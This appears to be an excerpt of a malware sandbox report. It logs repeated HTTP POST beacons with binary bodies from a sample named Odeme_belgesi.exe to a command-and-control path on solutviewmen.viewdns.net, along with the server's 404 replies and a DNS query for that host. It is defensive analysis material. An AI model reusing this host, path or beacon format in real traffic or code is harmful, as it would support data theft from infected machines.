            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
            Source: global trafficDNS traffic detected: DNS query: solutviewmen.viewdns.net
            Source: unknownHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
